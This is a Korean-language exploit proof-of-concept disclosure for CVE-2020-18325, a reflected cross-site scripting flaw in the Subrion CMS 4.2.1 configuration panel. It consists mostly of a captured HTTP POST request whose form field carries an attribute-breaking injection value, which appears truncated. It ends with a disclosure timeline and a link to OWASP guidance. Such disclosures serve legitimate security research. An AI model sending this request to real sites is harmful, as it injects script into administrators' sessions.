
CVE-2020-18325에 대한 익스플로잇 PoC
Subrion CMS는 설치가 쉽고 관리가 간단합니다. 단독 애플리케이션으로 사용하거나 다른 애플리케이션과 함께 사용하여 초급 수준 사이트, 중형 또는 대형 사이트를 만들 수 있습니다.
Subrion CMS v.4.2.1 구성 패널에서 여러 반사형 크로스 사이트 스크립팅 취약점이 발견되어 원격 공격자가 임의의 JavaScript를 주입할 수 있습니다.
날짜: 27-02-2022
소프트웨어 링크: https://subrion.org
익스플로잇 작성자: HaMM0nz
CVE: CVE-2020-18325
카테고리: 웹 애플리케이션
영향받는 URL
POST /panel/configuration/pictures/ HTTP/1.1
Host: 172.16.63.129
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.63.129/panel/configuration/pictures/
Content-Type: multipart/form-data; boundary=---------------------------17647740521660843247800008623
Content-Length: 5605
Connection: close
Cookie: INTELLI_7da515443a=2hen33trbsgsadue2rgcti4sr1; loader=loaded
Upgrade-Insecure-Requests: 1
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="__st"
t9eQz0wrvfrlVO1rNDO9ZbPOB3mDmkNw8k17yS6f
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="c[image_quality]"
1
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[image_quality]"
75
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="c[allow_animated_gifs]"
1
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[allow_animated_gifs]"
0
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[allow_animated_gifs]"
test">1qazx
발견 및 보고 : 2019년 6월 24일
CVE ID 할당 : 2021년 8월 11일
공개 : 2022년 2월 27일
OWASP의 XSS 방지 가이드라인을 준수하는 것을 고려하십시오. (https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)